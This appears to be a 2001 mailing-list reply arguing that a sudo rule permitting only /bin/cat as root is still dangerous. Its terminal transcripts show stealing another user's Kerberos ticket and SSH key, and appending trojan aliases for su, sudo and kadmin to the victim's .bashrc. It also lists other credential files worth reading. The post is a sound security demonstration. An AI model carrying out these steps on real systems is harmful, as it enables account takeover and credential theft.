On Sat, Jul 07, 2001 at 02:10:09AM +0100, Eric E Moore wrote: [cut] > I would be very shocked if you could compromise a system with a > sudoers entry of: > me hostname = (root) /bin/cat
Depends on what's on the system. I've thought of four similar ways. 1: With Kerberos, you can steal someone's ticket-granting ticket and use it until it expires. My example also uses AFS: | [EMAIL PROTECTED]:~$ klist | Ticket cache: FILE:/tmp/krb5cc_q5bOCp | Default principal: [EMAIL PROTECTED] | | Valid starting Expires Service principal | 07/06/01 22:29:11 07/07/01 08:29:11 host/[EMAIL PROTECTED] | 07/06/01 22:29:11 07/07/01 08:29:11 krbtgt/[EMAIL PROTECTED] | 07/06/01 22:29:11 07/07/01 08:29:11 afs/[EMAIL PROTECTED] | | | Kerberos 4 ticket cache: /tmp/tkt1001 | klist: You have no tickets cached | [EMAIL PROTECTED]:~$ cd /tmp | [EMAIL PROTECTED]:/tmp$ ls -al | total 20 | drwxrwxrwt 3 root root 1024 Jul 6 22:29 . | drwxr-xr-x 21 root root 1024 Jun 27 23:41 .. | -rw------- 1 waoki waoki 892 Jul 6 01:40 krb5cc_1002 | -rw------- 1 waoki waoki 848 Jul 6 22:22 krb5cc_GMJQN9 | -rw------- 1 test test 885 Jul 6 22:28 krb5cc_SyJR0W | -rw------- 1 test test 885 Jul 6 22:26 krb5cc_YzLI0R | -rw------- 1 test test 1243 Jul 6 22:29 krb5cc_q5bOCp | drwxr-xr-x 2 root root 12288 Nov 14 2000 lost+found | [EMAIL PROTECTED]:/tmp$ ls -al /afs/g6net.com/user/waoki/secure | ls: /afs/g6net.com/user/waoki/secure: Permission denied | [EMAIL PROTECTED]:/afs/g6net.com/user/waoki$ touch /afs/g6net.com/user/waoki/afile | touch: creating `/afs/g6net.com/user/waoki/afile': Permission denied Nope, can't access someone else's homedir... | [EMAIL PROTECTED]:/tmp$ sudo -v | | We trust you have received the usual lecture from the local System | Administrator. It usually boils down to these two things: | | #1) Respect the privacy of others. | #2) Think before you type. | | Password for [EMAIL PROTECTED]: Now we steal a TGT (but we could also go after the keytab)... | [EMAIL PROTECTED]:/tmp$ sudo /bin/cat krb5cc_GMJQN9 > krb5cc_q5bOCp | [EMAIL PROTECTED]:/tmp$ aklog ...and now I'm someone else! | [EMAIL PROTECTED]:/tmp$ klist | Ticket cache: FILE:/tmp/krb5cc_q5bOCp | Default principal: [EMAIL PROTECTED] | | Valid starting Expires Service principal | 07/06/01 22:21:56 07/07/01 08:21:52 krbtgt/[EMAIL PROTECTED] | 07/06/01 22:22:03 07/07/01 08:21:52 afs/[EMAIL PROTECTED] | | | Kerberos 4 ticket cache: /tmp/tkt1001 | klist: You have no tickets cached | | [EMAIL PROTECTED]:/tmp$ ls -al /afs/g6net.com/user/waoki/secure | total 4 | drwxr-xr-x 2 waoki waoki 2048 Jul 6 01:39 . | drwxr-xr-x 5 waoki waoki 2048 Jul 6 22:33 .. | -rw-r--r-- 1 waoki waoki 0 Jul 6 01:39 file (As an aside, although the 'secure' directory above is mode 755, it's on AFS, so the Unix mode bits don't apply.) Now let's set up some trojans: | [EMAIL PROTECTED]:/tmp$ cp ~/.su.trojan ~/.sudo.trojan ~/.kadmin.trojan /afs/g6net.com/user/waoki/ | [EMAIL PROTECTED]:/tmp$ echo alias su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc | [EMAIL PROTECTED]:/tmp$ echo alias /bin/su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc | [EMAIL PROTECTED]:/tmp$ echo alias sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc | [EMAIL PROTECTED]:/tmp$ echo alias /usr/bin/sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc | [EMAIL PROTECTED]:/tmp$ echo alias kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc | [EMAIL PROTECTED]:/tmp$ echo alias /usr/sbin/kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc | [EMAIL PROTECTED]:/tmp$ 2: Something similar could be done if someone's ssh identity or id_dsa keys aren't password protected: | [EMAIL PROTECTED] test]$ sudo cat /home/waoki/.ssh/id_dsa > .ssh/id_dsa | [EMAIL PROTECTED] test]$ ssh localhost -l waoki and now I can trojan apps, or (since the default Debian sudo uses one timestamp file per user, instead of one per user per tty) I can wait for the victim to sudo, and then sudo without entering his password. 3 and 4: If the system's running Samba, access to /etc/smbpasswd lets me log in to Samba as anyone who appears in /etc/smbpasswd. If the system is using Netatalk with randnum authentication, users' AppleTalk passwords will be stored in plaintext in ~/.passwd. Once again, I can trojan binaries and scripts. Oh, and catting /proc/kcore could yield interesting information. -- William Aoki [EMAIL PROTECTED] (801)-(58)5-1924 UMNH Computer Support Room 001, GTB (801)-(58)1-6928 1390 E President's Circle Salt Lake City, Utah 84112-0050 Key 199D8C7B Fingerprint 3B0A 6800 8A1A 78A7 9A26 BB92 6329 2D3E 199D 8C7B